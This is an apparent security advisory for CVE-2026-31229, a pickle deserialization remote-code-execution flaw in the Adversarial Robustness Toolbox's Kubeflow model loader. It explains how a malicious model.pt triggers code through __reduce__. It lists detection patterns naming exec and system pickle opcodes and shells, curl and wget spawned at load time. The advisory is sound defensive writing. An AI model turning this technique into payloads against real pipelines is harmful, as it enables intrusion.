CVE-2026-31229: Adversarial Robustness Toolbox RCE Flaw

CVE-2026-31229 Overview

CVE-2026-31229 is an insecure deserialization vulnerability [CWE-502] in the Adversarial Robustness Toolbox (ART) through version 1.20.1. The flaw resides in the Kubeflow component's model loading functionality. The code calls torch.load() without the weights_only=True parameter when loading model weights such as model.pt files. This permits deserialization of arbitrary Python objects through the Pickle module. An attacker who controls a referenced model file or the model_id parameter can achieve remote code execution when the pipeline loads the model.

Critical Impact

Unauthenticated attackers can execute arbitrary code on systems running ART robustness evaluation pipelines by supplying a malicious PyTorch model file.

Affected Products

• Adversarial Robustness Toolbox (ART) versions through 1.20.1
• ART Kubeflow component model loading functionality
• Pipelines invoking ART robustness evaluation with attacker-controlled model_id or model storage

Discovery Timeline

• 2026-05-12 - CVE-2026-31229 published to NVD
• 2026-05-13 - Last updated in NVD database

Technical Details for CVE-2026-31229

Vulnerability Analysis

The Adversarial Robustness Toolbox is an open-source library for machine learning security and robustness evaluation. Its Kubeflow integration loads PyTorch model weights from object storage during evaluation pipelines. The loader invokes torch.load() on attacker-reachable file paths without enabling the weights_only=True safeguard introduced by PyTorch to restrict unpickling to tensor data.

Without this flag, torch.load() falls through to Python's pickle module and reconstructs arbitrary objects. Pickle deserialization executes any callable referenced through __reduce__ methods embedded in the serialized payload. An attacker who can write to the model storage bucket or influence the model_id parameter passed into the pipeline can therefore trigger code execution in the loading process.

Root Cause

The root cause is unsafe deserialization through pickle during model weight loading. The Kubeflow loader trusts the contents of .pt files as benign tensor data. PyTorch's default torch.load() behavior without weights_only=True honors arbitrary pickle opcodes, including REDUCE, which calls a stored callable with stored arguments at load time.

Attack Vector

The attack is network-reachable and requires no authentication or user interaction. An attacker uploads a crafted model.pt file to an object storage location referenced by the pipeline, or sets the model_id parameter to point to such a file. When the pipeline next executes evaluation, the malicious __reduce__ payload runs inside the pipeline worker, providing remote code execution with the privileges of the ART runtime.

No verified public proof-of-concept code is referenced in the advisory. See the GitHub Adversarial Robustness Toolbox repository for component source and the CVE-2026-31229 technical write-up for additional detail.

Detection Methods for CVE-2026-31229

Indicators of Compromise

• Unexpected child processes spawned by Python workers running ART pipelines, particularly shells, curl, wget, or interpreters launched during model load.
• Outbound network connections from Kubeflow pipeline pods to unfamiliar IPs or domains immediately after torch.load() execution.
• New or modified .pt, .pth, or .bin files in object storage buckets that lack a corresponding training job or commit reference.

Detection Strategies

• Inspect ART and Kubeflow pipeline code for calls to torch.load() without the weights_only=True argument and flag for review.
• Hunt for pickle opcodes such as c__builtin__\nexec or cposix\nsystem within stored model files using YARA or simple byte scanners.
• Correlate model file write events in object storage with the identity and source of the uploader to identify unauthorized model artifacts.

Monitoring Recommendations

• Enable runtime process and network telemetry on Kubeflow worker nodes and forward to a centralized analytics platform for behavioral analysis.
• Audit access logs on the object storage buckets backing model registries for writes from non-pipeline identities.
• Track invocations of ART evaluation jobs and the model_id values they resolve, alerting on values outside an allowlist of trusted artifact paths.

How to Mitigate CVE-2026-31229

Immediate Actions Required

• Upgrade Adversarial Robustness Toolbox to a release later than 1.20.1 that addresses the deserialization flaw once published by the maintainers.
• Patch local forks and downstream pipelines to invoke torch.load(..., weights_only=True) for every model load path until the upstream fix is integrated.
• Restrict write access on model storage buckets to a small set of trusted service accounts and revoke broad write permissions from pipeline users.

Patch Information

Monitor the Trusted-AI Adversarial Robustness Toolbox repository for fixed releases and security advisories. No vendor patch identifier is listed in the NVD entry at the time of publication. Apply the maintainer-provided fix as soon as it is released and rebuild any container images that bundle ART.

Workarounds

• Pass weights_only=True explicitly to every torch.load() call in pipeline code that handles untrusted model artifacts.
• Validate the integrity of model files using cryptographic signatures or hashes recorded at training time before loading them in evaluation pipelines.
• Isolate Kubeflow pipeline workers in a sandboxed namespace with egress filtering so that an exploited worker cannot reach internal services or the internet.

# Configuration example: enforce safe PyTorch deserialization in pipeline code
# Replace unsafe model loading
# model = torch.load(model_path)
# with the restricted form:
model = torch.load(model_path, weights_only=True)

# Restrict bucket writes to the training service account only
gsutil iam ch -d allUsers gs://art-model-registry
gsutil iam ch serviceAccount:training@project.iam.gserviceaccount.com:objectCreator gs://art-model-registry